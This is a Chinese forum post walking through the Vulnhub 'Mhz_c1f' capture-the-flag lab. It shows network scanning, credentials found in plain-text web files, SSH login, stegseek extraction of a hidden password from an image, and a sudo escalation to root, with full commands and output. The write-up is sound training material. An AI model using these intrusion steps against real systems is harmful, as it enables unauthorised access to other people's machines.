Vulnhub之Mhz_c1f靶机详细测试过程

卖不甜枣  金牌会员 | 2023-4-7 22:30:00 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 807|帖子 807|积分 2421

Mhz_c1f

作者: jason huawen
靶机信息

名称:mhz_cxf: c1f
地址:
  1. https://www.vulnhub.com/entry/mhz_cxf-c1f,471/
复制代码
识别目标主机IP地址
  1. sudo netdiscover -i eth1 -r 192.168.56.0/24
  2. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                       
  3.                                                                                                                                                             
  4. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
  5. _____________________________________________________________________________
  6.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
  7. -----------------------------------------------------------------------------
  8. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                          
  9. 192.168.56.100  08:00:27:64:18:1b      1      60  PCS Systemtechnik GmbH                                                                                   
  10. 192.168.56.249  08:00:27:02:7b:29      1      60  PCS Systemtechnik GmbH      
复制代码
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.249
NMAP扫描
  1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]
  2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.249 -oN nmap_full_scan
  3. Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-07 02:18 EDT
  4. Nmap scan report for localhost (192.168.56.249)
  5. Host is up (0.00013s latency).
  6. Not shown: 65533 closed tcp ports (reset)
  7. PORT   STATE SERVICE VERSION
  8. 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  9. | ssh-hostkey:
  10. |   2048 38:d9:3f:98:15:9a:cc:3e:7a:44:8d:f9:4d:78:fe:2c (RSA)
  11. |   256 89:4e:38:77:78:a4:c3:6d:dc:39:c4:00:f8:a5:67:ed (ECDSA)
  12. |_  256 7c:15:b9:18:fc:5c:75:aa:30:96:15:46:08:a9:83:fb (ED25519)
  13. 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
  14. |_http-title: Apache2 Ubuntu Default Page: It works
  15. |_http-server-header: Apache/2.4.29 (Ubuntu)
  16. MAC Address: 08:00:27:02:7B:29 (Oracle VirtualBox virtual NIC)
  17. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  19. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  20. Nmap done: 1 IP address (1 host up) scanned in 9.20 seconds
复制代码
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
  1. ─$ curl http://192.168.56.249/robots.txt
  2. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  3. <html><head>
  4. <title>404 Not Found</title>
  5. </head><body>
  6. <h1>Not Found</h1>
  7. <p>The requested URL was not found on this server.</p>
  8. <hr>
  9. <address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.249 Port 80</address>
  10. </body></html>
复制代码
  1. └─$ nikto -h http://192.168.56.249
  2. - Nikto v2.1.6
  3. ---------------------------------------------------------------------------
  4. + Target IP:          192.168.56.249
  5. + Target Hostname:    192.168.56.249
  6. + Target Port:        80
  7. + Start Time:         2023-04-07 02:19:53 (GMT-4)
  8. ---------------------------------------------------------------------------
  9. + Server: Apache/2.4.29 (Ubuntu)
  10. + The anti-clickjacking X-Frame-Options header is not present.
  11. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  12. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  13. + No CGI Directories found (use '-C all' to force check all possible dirs)
  14. + Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a40b796e2191, mtime: gzip
  15. + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
  16. + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
  17. + OSVDB-3233: /icons/README: Apache default file found.
  18. + /notes.txt: This might be interesting...
  19. + 7915 requests: 0 error(s) and 8 item(s) reported on remote host
  20. + End Time:           2023-04-07 02:20:17 (GMT-4) (24 seconds)
  21. ---------------------------------------------------------------------------
  22. + 1 host(s) tested
  23.                                                                                                                                                             
  24. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]
  25. └─$ curl http://192.168.56.249/notes.txt
  26. 1- i should finish my second lab
  27. 2- i should delete the remb.txt file and remb2.txt
复制代码
notes.txt提示可能有两个文件:remb.txt, remb2.txt
  1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]
  2. └─$ curl http://192.168.56.249/remb.txt  
  3. first_stage:flagitifyoucan1234
  4.                                                                                                                                                             
  5. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]
  6. └─$ curl http://192.168.56.249/remb2.txt
  7. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  8. <html><head>
  9. <title>404 Not Found</title>
  10. </head><body>
  11. <h1>Not Found</h1>
  12. <p>The requested URL was not found on this server.</p>
  13. <hr>
  14. <address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.249 Port 80</address>
  15. </body></html>
复制代码
remb.txt是不是ssh用户名和密码,尝试一下:(remb2.txt文件不存在)
  1. ──(kali㉿kali)-[~/Desktop/Vulnhub/MH]
  2. └─$ ssh first_stage@192.168.56.249                             
  3. The authenticity of host '192.168.56.249 (192.168.56.249)' can't be established.
  4. ED25519 key fingerprint is SHA256:Jxm0b2xUhxb2N50E9UVsgn5u7Pow8xX6o12kZDGlTlg.
  5. This key is not known by any other names
  6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  7. Warning: Permanently added '192.168.56.249' (ED25519) to the list of known hosts.
  8. first_stage@192.168.56.249's password:
  9. Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)
  11. * Documentation:  https://help.ubuntu.com
  12. * Management:     https://landscape.canonical.com
  13. * Support:        https://ubuntu.com/advantage
  15.   System information as of Fri Apr  7 06:33:12 UTC 2023
  17.   System load:  0.0               Processes:             90
  18.   Usage of /:   38.2% of 9.78GB   Users logged in:       0
  19.   Memory usage: 16%               IP address for enp0s3: 192.168.56.249
  20.   Swap usage:   0%
  23. 23 packages can be updated.
  24. 0 updates are security updates.
  27. Last login: Fri Apr 24 18:18:07 2020 from 192.168.5.253
  28. $ id
  29. uid=1001(first_stage) gid=1001(first_stage) groups=1001(first_stage)
  30. $ bash -i
  31. first_stage@mhz_c1f:~$
复制代码
  1. first_stage@mhz_c1f:~$ cat user.txt
  2. HEEEEEY , you did it
  3. that's amazing , good job man
  5. so just keep it up and get the root bcz i hate low privileges ;)
  7. #mhz_cyber
复制代码
将mhz_ctf家目录的图片下载到Kali Linux本地进行分析,其中一个图片可以破解密码从而解密内容:
  1.                                                                                                                                                             
  2. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]
  3. └─$ stegseek spi.jpeg            
  4. StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
  6. [i] Found passphrase: ""
  7. [i] Original filename: "remb2.txt".
  8. [i] Extracting to "spi.jpeg.out".
  10.                                                                                                                                                             
  11. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]
  12. └─$ cat spi.jpeg.out                          
  13. ooh , i know should delete this , but i cant' remember it
  14. screw me
  16. mhz_c1f:1@ec1f
复制代码
  1. first_stage@mhz_c1f:/home/mhz_c1f/Paintings$ su - mhz_c1f
  2. Password:
  3. mhz_c1f@mhz_c1f:~$ id
  4. uid=1000(mhz_c1f) gid=1000(mhz_c1f) groups=1000(mhz_c1f),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
  5. mhz_c1f@mhz_c1f:~$ sudo -l
  6. [sudo] password for mhz_c1f:
  7. Matching Defaults entries for mhz_c1f on mhz_c1f:
  8.     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  10. User mhz_c1f may run the following commands on mhz_c1f:
  11.     (ALL : ALL) ALL
  12. mhz_c1f@mhz_c1f:~$ sudo /bin/bash
  13. root@mhz_c1f:~# cd /root
  14. root@mhz_c1f:/root# ls -alh
  15. total 32K
  16. drwx------  3 root root 4.0K Apr 24  2020 .
  17. drwxr-xr-x 24 root root 4.0K Apr 13  2020 ..
  18. -rw-------  1 root root   54 Apr 24  2020 .bash_history
  19. -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
  20. -rw-r--r--  1 root root  148 Aug 17  2015 .profile
  21. -rw-r--r--  1 root root  124 Apr 24  2020 .root.txt
  22. drwx------  2 root root 4.0K Apr 13  2020 .ssh
  23. -rw-------  1 root root  833 Apr 24  2020 .viminfo
  24. root@mhz_c1f:/root# cat .root.txt
  25. OwO HACKER MAN :D
  27. Well done sir , you have successfully got the root flag.
  28. I hope you enjoyed in this mission.
  30. #mhz_cyber
  31. root@mhz_c1f:/root#
复制代码
至此得到了root shell以及root flag
经验教训


  • 在得到shell后提权时方向是对的,因为检查其他的提权漏洞都没有发现,可疑的就是mhz_ctf用户目录下的几个图片文件,但是在检查了2个图片后就中止,以为方向问题,其实答案就在第4个图片文件中,所以需要坚持的精神

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

卖不甜枣

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表